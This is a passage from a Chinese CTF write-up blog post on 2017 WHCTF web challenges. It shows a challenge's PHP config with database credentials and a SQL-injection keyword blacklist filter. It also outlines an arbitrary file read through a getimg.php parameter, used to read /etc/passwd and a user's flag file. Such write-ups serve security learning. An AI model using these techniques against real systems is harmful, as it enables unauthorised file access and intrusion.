class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$DBHOST = <span class="string">"localhost"</span>;</span><br><span class="line">$DBUSER = <span class="string">"root"</span>;</span><br><span class="line">$DBPASS = <span class="string">"whctfxss"</span>;</span><br><span class="line">$DBNAME = <span class="string">"xss"</span>;</span><br><span class="line">$TBNAME = <span class="string">"xss"</span>;</span><br><span class="line">$TBCOLUMN=<span class="keyword">Array</span>(</span><br><span class="line">    <span class="string">"id"</span>=&gt;<span class="string">"id"</span>,</span><br><span class="line">    <span class="string">"name"</span>=&gt;<span class="string">"name"</span>,</span><br><span class="line">    <span class="string">"phone"</span>=&gt;<span class="string">"phone"</span>,</span><br><span class="line">    <span class="string">"secret"</span>=&gt;<span class="string">"secret"</span>,</span><br><span class="line">    <span class="string">"hasread"</span>=&gt;<span class="string">"hasread"</span>,</span><br><span class="line"></span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">generate_md5</span><span class="params">()</span></span>&#123;</span><br><span class="line">$number=mt_rand(<span class="number">0</span>,<span class="number">1000000</span>);</span><br><span class="line">$rand=md5($number);</span><br><span class="line"><span class="keyword">return</span> substr($rand,<span class="number">0</span>,<span class="number">5</span>);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Filter</span><span class="params">($string)</span></span>&#123;</span><br><span class="line">    $blacklist = <span class="string">"sleep|benchmark|information|order|limit|load_file|select|union|system|alter|show|outfile|dumpfile|into|execute|column|table|extractvalue|floor|update|insert|delete"</span>;</span><br><span class="line">    $whitechar = <span class="string">"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'()._*`-@=+&gt;&lt;\"&#123;&#125;;/: ?,"</span>;</span><br><span class="line">    <span class="keyword">for</span> ($i=<span class="number">0</span>;$i&lt;strlen($string);$i++)&#123;</span><br><span class="line">        <span class="keyword">if</span> (strpos(<span class="string">"$whitechar"</span>,$string[$i])===<span class="keyword">false</span>)&#123;</span><br><span class="line"><span class="keyword">return</span> <span class="string">"hacker!"</span>;</span><br><span class="line">&#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/$blacklist/is"</span>,$string))&#123;</span><br><span class="line"><span class="keyword">return</span> <span class="string">"hacker!"</span>;</span><br><span class="line">&#125;</span><br><span class="line">    <span class="keyword">if</span> (is_string($string))&#123;</span><br><span class="line">        <span class="keyword">return</span> addslashes($string);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$conn=mysql_connect($DBHOST,$DBUSER,$DBPASS);</span><br><span class="line"></span><br><span class="line">mysql_query(<span class="string">"use &#123;$DBNAME&#125;"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>这里有遇到了一个问题就是poc换行之后不奏效<br>不知道各位表哥会不会遇到这个情况Orz</p>
<hr>
<h2 id="Scanner"><a href="#Scanner" class="headerlink" title="Scanner"></a>Scanner</h2><p>emmm这题环境也关掉了 无法复现。。<br>我一开始还天真的以为flag藏在各种各样的文件夹里面。。然后就去傻乎乎的改自己的扫描器。。。（还没改完）<br>但是根据表哥们的wp 思路大致是这样的：<br>查看到可疑请求 —-<a href="http://118.31.18.64:20008/c181948a9bdee64753468823ac57a870/github.com/getimg.php?pic=xxx.png" target="_blank" rel="noopener">http://118.31.18.64:20008/c181948a9bdee64753468823ac57a870/github.com/getimg.php?pic=xxx.png</a><br>随后跟进测试发现此php可以实现任意文件读取<br>读取 /etc/passwd后发现flag用户<br>最后读取此用户home目录下的flag</p>
<hr>
<h5 id="表哥们的wp"><a href="#表哥们的wp" class="headerlink" title="表哥们的wp"></a>表哥们的wp</h5><p>Kap0k : <a href="http://www.kap0k.com/archives/948" target="_blank" rel="noopener">http://www.kap0k.com/archives/948</a><br>浩子哥哥 : <a href="https://mp.weixin.qq.com/s/XBBx0rWZu9bAwt62F6Ai8g" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/XBBx0rWZu9bAwt62F6Ai8g</a><br>并且宣传一波浩子哥哥的公众号 : HenceTech</p>

      
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/">[2017WHCTF] Web详细复现(伪)WP</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 Pr0ph3t 的个人博客">Pr0ph3t</a></p>
        <p><span>发布时间:</span>2017年09月19日 - 19时41分</p>
        <p><span>最后更新:</span>2019年07月06日 - 17时54分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/" title="[2017WHCTF] Web详细复现(伪)WP">https://blog.pr0ph3t.com/2017/09/19/2017WHCTF-Web详细复现-伪-WP/</a>
            <span class="copy-path" data-clipboard-text="原文: https://blog.pr0ph3t.com/2017/09/19/2017WHCTF-Web详细复现-伪-WP/　　作者: Pr0ph3t" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target = "_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2017/09/24/2017强网杯-线下总结/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          [2017强网杯] 线下总结
        
      </div>
    </a>
  
  
    <a href="/2017/09/11/2017强网杯-Web-Writeup/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">[2017强网杯] Web Writeup</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Router"><span class="toc-number">1.</span> <span class="toc-text">Router</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CAT"><span class="toc-number">2.</span> <span class="toc-text">CAT</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Scanner"><span class="toc-number">3.</span> <span class="toc-text">Scanner</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#表哥们的wp"><span class="toc-number">3.0.0.1.</span> <span class="toc-text">表哥们的wp</span></a></li></ol></li></ol></li></ol></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>







    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2017/09/24/2017强网杯-线下总结/" title="上一篇: [2017强网杯] 线下总结">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2017/09/11/2017强网杯-Web-Writeup/" title="下一篇: [2017强网杯] Web Writeup">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/07/06/hello-world/">Hello World</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/05/01/题目-记一次利用gopher的内网mysql盲注/">[题目]记一次利用gopher的内网mysql盲注</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/02/03/hitctf-Web-Writeup/">[hitctf] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/26/hitcon2017-Baby-H-master-php-2017-复现/">[hitcon2017] Baby^H-master-php-2017 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/14/hitcon2017-SSRF-Me复现/">[hitcon2017] SSRF Me复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/01/08/hitcon2017-Sql-so-hard-复现/">[hitcon2017] Sql-so-hard 复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/12/23/2017-X-NUCA-总决赛小结/">[2017 X-NUCA]总决赛小结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/27/hitcon2017-BabyFirst-Revenge-V2复现/">[hitcon2017] BabyFirst Revenge V2复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/26/hitcon2017-BabyFirst-Revenge复现/">[hitcon2017] BabyFirst Revenge复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/11/08/Web狗要懂的Padding-Oracle攻击/">Web狗要懂的Padding Oracle攻击</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/24/Web狗要懂的CBC翻转字节攻击-Flipped-Ciphertext-Bits/">Web狗要懂的CBC翻转字节攻击(Flipped Ciphertext Bits)</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/10/2017世安杯-决赛Writeup/">[2017世安杯] 决赛Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/10/09/2017世安杯-初赛Web-Writeup/">[2017世安杯] 初赛Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/24/2017强网杯-线下总结/">[2017强网杯] 线下总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/19/2017WHCTF-Web详细复现-伪-WP/">[2017WHCTF] Web详细复现(伪)WP</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/09/11/2017强网杯-Web-Writeup/">[2017强网杯] Web Writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/15/XMAN-线下赛总结/">[XMAN] 线下赛总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/08/14/2017X-nuca-赛前热身Writeup/">[2017X-nuca] 赛前热身Writeup</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 Pr0ph3t
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" >到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>


<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');

ga('create', 'UA-87275583-1', 'auto');
ga('send', 'pageview');

</script>
<!-- End Google Analytics -->




<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>